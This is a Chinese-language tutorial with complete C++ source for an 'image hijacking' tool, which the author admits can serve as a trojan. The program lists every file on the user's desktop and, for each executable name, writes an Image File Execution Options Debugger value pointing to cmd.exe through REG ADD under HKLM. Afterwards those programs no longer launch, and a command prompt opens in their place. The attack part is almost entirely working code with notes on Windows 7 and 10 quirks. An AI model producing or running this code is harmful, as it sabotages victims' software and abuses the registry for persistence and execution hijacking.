#####实现映像劫持所必需的头文件有:
#include "shlobj.h"
#include <iostream>
#include <string>
#include <list>
#include <vector>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <io.h>
#####在这里,我的程序并未使用任何隐藏技术和多线程技术,准确的说不能算是木马,但是必要之时却也可以起到相应的作用。由于节约时间的问题,我仅仅制作了对当前用户桌面下的所有文件的映像劫持。
######获取桌面路径:
string getDesktopPath() //获取桌面路径
{
LPITEMIDLIST pidl;
LPMALLOC pShellMalloc;
char szDir[200];
if (SUCCEEDED(SHGetMalloc(&pShellMalloc)))
{
if (SUCCEEDED(SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl))) {
// 如果成功返回true
SHGetPathFromIDListA(pidl, szDir);
pShellMalloc->Free(pidl);
}
pShellMalloc->Release();
}
return string(szDir);
}
######遍历桌面下所有文件并将所有文件添加到我的list中,来模拟实现链表的功能:
int GetAllgpxFilepathFromfolder(string Path)
{
char szFind[MAX_PATH];
WIN32_FIND_DATA FindFileData;
strcpy(szFind, Path.c_str());
strcat(szFind, "\\*.*");
HANDLE hFind = FindFirstFile(szFind, &FindFileData);
if (INVALID_HANDLE_VALUE == hFind) return -1;
do
{
if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
if (strcmp(FindFileData.cFileName, ".") != 0 && strcmp(FindFileData.cFileName, "..") != 0)
{
char szFile[MAX_PATH] = { 0 };
strcpy(szFile, Path.c_str());
strcat(szFile, "\\");
strcat(szFile, FindFileData.cFileName);
GetAllgpxFilepathFromfolder(szFile);
}
}else{
FileName.push_back(FindFileData.cFileName);
}
} while (FindNextFile(hFind, &FindFileData));
FindClose(hFind);
return 0;
}
######作用是从字符串str中把所有的字符A转换成B,虽然我感觉他这个函数写的还是有点问题。。
void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
std::size_t found = S.find(A);
while (std::string::npos != found) {
S.replace(found, A.length(), B);
found = S.find(A, found + 1);
}
}
#####基本的核心代码就是以上这些,现在我们来看下主函数调用:(构造函数已省略,完全代码在后面。)
Hacker* one = new Hacker();
string arr;
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
replaceA_to_B(*itor, ".lnk", ".exe");
int pos = 0;
pos =(*itor).find(".exe");
if (-1 != pos)
{
*itor = (*itor).substr(0, pos+4);
}
}
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
arr = "REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + *itor + "\"" + " /v Debugger /t REG_SZ /d \"cmd.exe\" /f";
system(arr.c_str());
}
system("pause");
return 0;
#####唯一要注意的就是win7下貌似注册表项要加双引号才可以访问,win10貌似没有这个要求。在C/C++中,要注意转义字符,所以特别提醒这个双引号转义的问题。
附全部源码:
#include "shlobj.h"
#include <iostream>
#include <string>
#include <list>
#include <vector>
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
#include <io.h>
using namespace std;
class Hacker {
public:
Hacker()
{
Path = this->getDesktopPath();
GetAllgpxFilepathFromfolder(Path);
}
private:
string Path;
public:
list<string> FileName;
private:
string getDesktopPath() //获取桌面路径
{
LPITEMIDLIST pidl;
LPMALLOC pShellMalloc;
char szDir[200];
if (SUCCEEDED(SHGetMalloc(&pShellMalloc)))
{
if (SUCCEEDED(SHGetSpecialFolderLocation(NULL, CSIDL_DESKTOP, &pidl))) {
// 如果成功返回true
SHGetPathFromIDListA(pidl, szDir);
pShellMalloc->Free(pidl);
}
pShellMalloc->Release();
}
return string(szDir);
}
private:
int GetAllgpxFilepathFromfolder(string Path)
{
char szFind[MAX_PATH];
WIN32_FIND_DATA FindFileData;
strcpy(szFind, Path.c_str());
strcat(szFind, "\\*.*");
HANDLE hFind = FindFirstFile(szFind, &FindFileData);
if (INVALID_HANDLE_VALUE == hFind) return -1;
do
{
if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
if (strcmp(FindFileData.cFileName, ".") != 0 && strcmp(FindFileData.cFileName, "..") != 0)
{
//发现子目录,递归之
char szFile[MAX_PATH] = { 0 };
strcpy(szFile, Path.c_str());
strcat(szFile, "\\");
strcat(szFile, FindFileData.cFileName);
GetAllgpxFilepathFromfolder(szFile);
}
}else{
FileName.push_back(FindFileData.cFileName);
}
} while (FindNextFile(hFind, &FindFileData));
FindClose(hFind);
return 0;
}
};
void replaceA_to_B(std::string& S, const std::string A, const std::string B) {
std::size_t found = S.find(A);
while (std::string::npos != found) {
S.replace(found, A.length(), B);
found = S.find(A, found + 1);
}
}
int main()
{
Hacker* one = new Hacker();
string arr;
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
replaceA_to_B(*itor, ".lnk", ".exe");
int pos = 0;
pos =(*itor).find(".exe");
if (-1 != pos)
{
*itor = (*itor).substr(0, pos+4);
}
}
for (list<string>::iterator itor = one->FileName.begin(); itor != one->FileName.end(); itor++)
{
arr = "REG ADD \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" + *itor + "\"" + " /v Debugger /t REG_SZ /d \"cmd.exe\" /f";
system(arr.c_str());
}
system("pause");
return 0;
}
